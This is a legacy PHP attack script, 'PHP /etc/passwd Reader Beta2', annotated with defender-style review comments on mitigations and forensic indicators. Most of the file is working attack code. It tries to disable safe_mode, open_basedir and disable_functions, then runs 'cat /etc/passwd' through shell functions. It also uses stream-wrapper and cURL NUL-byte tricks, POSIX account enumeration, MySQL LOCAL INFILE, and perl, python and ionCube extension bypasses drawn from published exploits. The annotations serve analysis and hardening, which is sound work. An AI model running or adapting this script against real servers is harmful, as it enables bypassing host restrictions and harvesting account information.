PHP /etc/passwd Reader Beta2
<?php
// ======================================
// PHP /etc/passwd Reader Beta2
// Last modified: 2:16 PM 1/29/2010
// --------------------------------------
// Programmed by Hyp3rInj3cT10n
// HTTP://Hyp3rInj3cT10n.GooglePages.Com
// ======================================

// NOTE(review): Purpose, read from a defender's side. This script runs inside an
// already-compromised or attacker-controlled PHP context and walks through a fixed
// sequence of mechanisms for disclosing /etc/passwd: shell execution, plain file
// reads, stream wrappers, cURL, POSIX account lookups, MySQL LOAD DATA LOCAL INFILE,
// and three optional extensions. It stops (die) at the first stage that yields data.
// /etc/passwd is normally world-readable, so the real finding on a host where this
// ran is that arbitrary PHP executed at all; each stage below maps to a hardening
// control that should make that stage fail.
//
// NOTE(review): Several constructs used here no longer exist in current PHP
// (create_function was removed in 8.0, the mysql_* functions in 7.0, safe_mode in
// 5.4), so the file as a whole targets legacy runtimes. Static indicators visible
// in this listing: the "Trying via ..." progress strings, the table name
// adskfjlsdjf, a file.txt written beside the script, and the
// ini_restore()/ini_set() sequence over safe_mode, open_basedir and
// disable_functions.

##############################
# Configure Important Settings
##############################
// Would you like to try generation of the /etc/passwd via user groups?
// 1 = Yes (Default)
// 0 = No
$conf['groups'] = 1;

// If the whole /etc/passwd can't be read, try getting
// information on the following accounts (from the array).
// If you do not wish to use this option, don't modify it.
$conf['accounts'] = array();

// If you can access the MySQL database, enter the information below:
$MySQL['host'] = 'localhost'; // Host (default: localhost)
$MySQL['user'] = 'root'; // Username (default: root)
$MySQL['pass'] = ''; // Password (default is none)
$MySQL['db'] = ''; // Database name

##############################
# DO NOT MODIFY THE CODE BELOW
##############################
// Helper built with create_function(): its body is a string compiled at runtime.
// It prints progress, checks extension_loaded(), and otherwise calls dl() to try to
// load the named shared object.
// NOTE(review): mitigation for this helper is enable_dl=Off and not shipping
// unneeded extension binaries; dl() is unavailable in most web SAPIs on PHP 5.3+.
// NOTE(review): the body below contains no return statement, so
// $IsCallableExt(...) evaluates to NULL and the branches guarded by it do not run
// as written. That matters when reconstructing which stages could have produced
// output during an incident; it is not a reason to skip the matching controls.
$IsCallableExt = create_function('$ext','
// function IsCallableExt($ext)
// {
	echo "Trying via {$ext} extension...";
	// Check whether this extension can be used
	if ( @extension_loaded($ext) )
	{
		echo "extension loaded, trying...";
		$ext = 1; // YAY, it has already been enabled!
	}
	else
	{
		echo "extension is off. Trying to load {$ext} extension...";
		// We must try to enable it!
		if ( is_callable("dl") )
		{
			@dl((PHP_SHLIB_SUFFIX === "dll" ? "php_" : "").$ext.".".PHP_SHLIB_SUFFIX);
		}
		// Check whether it worked
		if ( @extension_loaded("posix") )
		{
			$ext = 1; // YAY, it worked!
		}
	}
// }
');

// Attempts to reset the three hardening directives from inside the script; every
// call is @-suppressed so failures are silent.
// NOTE(review): disable_functions can only be set in php.ini and open_basedir can
// only be tightened at runtime on PHP 5.3+, so on a maintained host these should be
// no-ops. Setting the directives via php_admin_value in the vhost or FPM pool keeps
// them out of reach of script-level overrides.
@ini_restore('safe_mode');
@ini_set('safe_mode',0);
@ini_restore('open_basedir');
@ini_set('open_basedir','');
@ini_restore('disable_functions');
@ini_set('disable_functions','');

// Check whether ini_get() can be used
// $conf['safe_mode'] is only assigned inside this branch; when the condition is
// false the echo below reads an undefined array key and reports "off".
if ( is_callable('ini_get') && ini_get('error_reporting') )
{
	$conf['safe_mode'] = ini_get('safe_mode');
}
echo "Safe-Mode is ".($conf['safe_mode'] ? 'on' : 'off' )."<br />\r\n";

// --- Shell execution stages (backtick, system, shell_exec) ---
// NOTE(review): mitigation is to list the command-execution functions in
// disable_functions wherever the application does not need them (disabling
// shell_exec also disables the backtick operator). Detection: the web server or
// PHP worker account spawning ls / cat child processes.
echo "Trying via backtick operator...";
if ( !$conf['safe_mode'] )
{
	$passwd = `cat /etc/passwd`;
	if ( $passwd )
	{
		die("DONE!<br /><br /><br /><br />\r\n".nl2br($passwd));
	}
}
echo "failed.<br />\r\nTrying via system()...";
$x = '';
// system() is probed with a harmless 'ls' first; the second argument receives the
// command's exit status, and the command output goes straight to the response.
if ( @system('ls',$x) )
{
	system('cat /etc/passwd',$passwd);
	if ( $passwd )
	{
		die("DONE!<br /><br /><br /><br />\r\n".nl2br($passwd));
	}
}
echo "failed.<br />\r\nTrying via shell_exec()...";
if ( @shell_exec('ls') )
{
	$passwd = shell_exec('cat /etc/passwd');
	if ( $passwd )
	{
		die("DONE!<br /><br /><br /><br />\r\n".nl2br($passwd));
	}
}

// --- Direct file reads ---
// NOTE(review): these go through PHP's normal file layer, so an open_basedir that
// excludes /etc is the control that makes them fail.
echo "failed.<br />\r\nTrying via readfile()...";
// readfile() writes the file to the response itself and returns the byte count.
if ( @readfile('/etc/passwd') )
{
	die();
}
echo "failed.<br />\r\nTrying via file_get_contents()...";
if ( @is_readable('/etc/passwd') )
{
	$passwd = file_get_contents('/etc/passwd');
	if ( $passwd )
	{
		die("DONE!<br /><br /><br /><br />\r\n".nl2br($passwd));
	}
}

// --- Stream wrapper stage ---
// Copies the target through the compress.zlib:// wrapper into file.txt in the
// script's own directory. There is no die() here, so execution continues and
// "failed." is printed even after a successful copy.
// NOTE(review): presumably aimed at old runtimes where wrapper paths were not
// checked against open_basedir; confirm against the PHP version in use.
// Detection: an unexpected file.txt appearing in a web-served directory.
echo "failed.<br />\r\nTrying via copy()...";
if ( is_callable('copy') )
{
	if ( @copy("compress.zlib:///etc/passwd",dirname($_SERVER['SCRIPT_FILENAME'])."/file.txt") )
	{
		echo "go to: ".dirname($_SERVER['SCRIPT_FILENAME'])."/file.txt";
	}
}

// --- cURL stage ---
// Builds a file:// URL with an embedded NUL byte followed by the script's own path.
// NOTE(review): looks like it relies on a path check in a legacy cURL extension
// that compared the full string while the read stopped at the NUL; verify. Keeping
// PHP patched is the mitigation, and the curl_* functions can be disabled where
// the application does not use them.
echo "failed.<br />\r\nTrying via CURL...";
if ( is_callable('curl_init') && is_callable('curl_exec') )
{
	$passwd = curl_init("file:///etc/passwd\x00".__FILE__);
	if ( curl_exec($passwd) )
	{
		var_dump(curl_exec($passwd));
		die();
	}
}
echo "failed.<br />\r\n";

# ---------------
# POSIX functions
# ---------------
// Rebuilds the account list entry by entry instead of opening the file: UIDs and
// GIDs 0..4999 are looked up one at a time, then the names in $conf['accounts'].
// NOTE(review): these lookups go through the system account database rather than
// PHP's file layer, so open_basedir presumably does not constrain them; add the
// posix_* functions to disable_functions when the application has no use for them.
if ( $IsCallableExt('posix') )
{
	echo "done.<br />\r\nTrying via posix_getpwuid()...";
	// Check whether posix_getpwuid() can be used
	if ( is_callable('posix_getpwuid') )
	{
		$passwd = array();
		for ( $i=0; $i<5000;$i++ )
		{
			$line = @posix_getpwuid($i);
			if ( $line )
			{
				$passwd[$i] = $line;
			}
		}
		// Validate that everything is good
		if ( count($passwd) )
		{
			die(implode("<br />\r\n",$passwd)); //Done, print it.
		}
	}
	echo "failed.<br />\r\nTrying via posix_getgrgid()...";
	// Check whether posix_getgrgid() can be used
	if ( $conf['groups'] && is_callable('posix_getgrgid') )
	{
		$passwd = array();
		for ( $i=0; $i<5000;$i++ )
		{
			$line = @posix_getgrgid($i);
			if ( $line )
			{
				$passwd[$i] = $line;
			}
		}
		// Validate that everything is good
		if ( count($passwd) )
		{
			die(implode("<br />\r\n",$passwd)); //Done, print it.
		}
	}
	echo "failed.<br />\r\nTrying via posix_getpwnam()...";
	// Check whether posix_getpwnam() can be used
	if ( is_callable('posix_getpwnam') )
	{
		$passwd = array();
		foreach ( $conf['accounts'] as $account )
		{
			$passwd[$account] = posix_getpwnam($account);
		}
		if ( count($passwd) )
		{
			die(implode("<br />\r\n",$passwd)); //Done, print it.
		}
	}
	echo "failed.<br />\r\nTrying via posix_getgrnam()...";
	// Check whether posix_getgrnam() can be used
	if ( $conf['groups'] && is_callable('posix_getgrnam') )
	{
		$passwd = array();
		foreach ( $conf['accounts'] as $account )
		{
			$passwd[$account] = posix_getgrnam($account);
		}
		if ( count($passwd) )
		{
			die(implode("<br />\r\n",$passwd)); //Done, print it.
		}
	}
}
echo "failed.<br />\r\n";

# ----------------------------------------
# MySQL Query (Local-Infile)
# http://milw0rm.com/exploits/4392
# ----------------------------------------
// Runs only when host, user, pass and db are all non-empty, so with the defaults
// above (empty pass and db) this stage is skipped. It creates a scratch table,
// loads the file into it with LOAD DATA LOCAL INFILE and prints the rows.
// NOTE(review): mitigation is local_infile=0 on the MySQL server, the client-side
// allow_local_infile ini setting switched off, and an application DB account
// without CREATE privilege. No DROP TABLE is issued in this listing, so a leftover
// table named adskfjlsdjf is a forensic artifact worth searching for.
echo "Trying via MySQL (LOCAL-INFILE)...";
if ( $MySQL['host'] && $MySQL['user'] && $MySQL['pass'] && $MySQL['db'] )
{
	mysql_connect($MySQL['host'],$MySQL['user'],$MySQL['pass']);
	mysql_select_db($MySQL['db']);
	mysql_query("CREATE TABLE adskfjlsdjf (a varchar(1024))");
	mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE adskfjlsdjf");
	$Query = mysql_query("SELECT a FROM adskfjlsdjf");
	if ( mysql_num_rows($Query) )
	{
		while ( $Row = mysql_fetch_row($Query) )
		{
			echo implode('',$Row)."\r\n<br />";
		}
		die();
	}
}
echo "failed.<br />\r\n";

// --- Optional-extension stages (perl, ionCube Loader, python) ---
// Each stage hands the read to an embedded interpreter or loader function.
// NOTE(review): whether these paths honour open_basedir / disable_functions
// depends on the extension version (see the advisories referenced below);
// mitigation is to load only the extensions the application needs and to keep
// enable_dl=Off so a script cannot load more.

# ----------------------------------------
# Perl extension
# http://milw0rm.com/exploits/4314
# ----------------------------------------
if ( $IsCallableExt('perl') )
{
	$perl = new perl();
	die($perl->eval("system('cat /etc/passwd')"));
}
echo "failed.<br />\r\n";

# ------------------------------------------
# ionCube Loader extension
# http://milw0rm.com/exploits/4517
# ------------------------------------------
if ( $IsCallableExt('ionCube Loader') )
{
	$passwd = @ioncube_read_file('/etc/passwd');
	if ( $passwd )
	{
		die(nl2br($passwd));
	}
}
echo "failed.<br />\r\n";

# ------------------------------------------
# Python extension
# http://milw0rm.com/exploits/7503
# ------------------------------------------
if ( $IsCallableExt('python') )
{
	$passwd = python_eval("
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
");
	if ( $passwd )
	{
		die(nl2br($passwd));
	}
}
echo "failed.<br />\r\n";

// Reached only when no stage above terminated the script with die().
echo <<<END
<br /><br />
Unable to read /etc/passwd, nothing worked.<br />
Try looking for new version at: <a href="http://hyp3rinj3ct10n.googlepages.com">http://hyp3rinj3ct10n.googlepages.com</a>.
END;
?>